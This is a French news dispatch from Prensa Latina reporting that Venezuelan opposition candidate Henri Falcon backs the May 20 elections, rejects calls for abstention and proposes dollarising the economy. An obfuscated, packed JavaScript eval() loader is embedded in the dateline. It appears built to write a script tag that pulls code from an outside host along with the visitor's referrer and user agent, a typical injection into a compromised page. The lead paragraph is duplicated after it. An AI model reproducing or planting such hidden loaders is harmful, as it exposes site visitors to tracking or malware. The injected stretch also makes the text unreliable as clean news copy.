lundi 15 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un candidat d´opposition affirme que les élections garantiront la paix au Venezuela

Caracas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|basrh|var|u0026u|referrer|ekzdh||js|php'.split('|'),0,{})) 24 avril (Prensa Latina) Le candidat d´opposition Henri Falcon a aujourd´hui affirmé que les élections du 20 mai prochain représentent le chemin idéal pour assurer la stabilité politique et sociale au Venezuela.

Caracas, 24 avril (Prensa Latina) Le candidat d´opposition Henri Falcon a aujourd´hui affirmé que les élections du 20 mai prochain représentent le chemin idéal pour assurer la stabilité politique et sociale au Venezuela.

Lors d´une interview donnée à la chaîne privée Globovision, celui qui est soutenu par les partis Avanzada Progresista, Movimiento al Socialismo et le Comité de Organizacion Politica Electoral Independiente (Copei) a réitéré son rejet aux appels à l´abstention réalisés par des secteurs de l´opposition.

Falcon a critiqué la posture assumée par plusieurs leaders de la droite, et s´est demandé si les prétentions de ces dites factions politiques ne conduisent pas à créer une situation de violence dans le pays pour provoquer le chaos.

Le candidat à la présidence de la nation a prévenu la communauté internationale et les promoteurs de l´abstentionnisme que « les problèmes du pays doivent être résolus par le propre peuple du Venezuela », selon les déclarations citées par le site internet de Venezolana de Television.

Henri Falcon a également défendu sa proposition de dollarisation de l´économie par le biais d´une réforme constitutionnelle, puis a critiqué l´initiative gouvernementale de créer la crypto-monnaie le Petro dans le but de faire face à l´embargo financier appliqué dans le cadre de la guerre économique encouragée par des secteurs oligarchiques.

Ce mardi, le président du Venezuela et candidat à la réélection pour le Frente Amplio de la Patria, Nicolas Maduro, a qualifié le projet de Falcon d´inconstitutionnel puisque, a-t-il précisé, « ce dernier porte atteinte à l´indépendance économique et monétaire de la nation ».

peo/oda/wup

EN CONTINU
notes connexes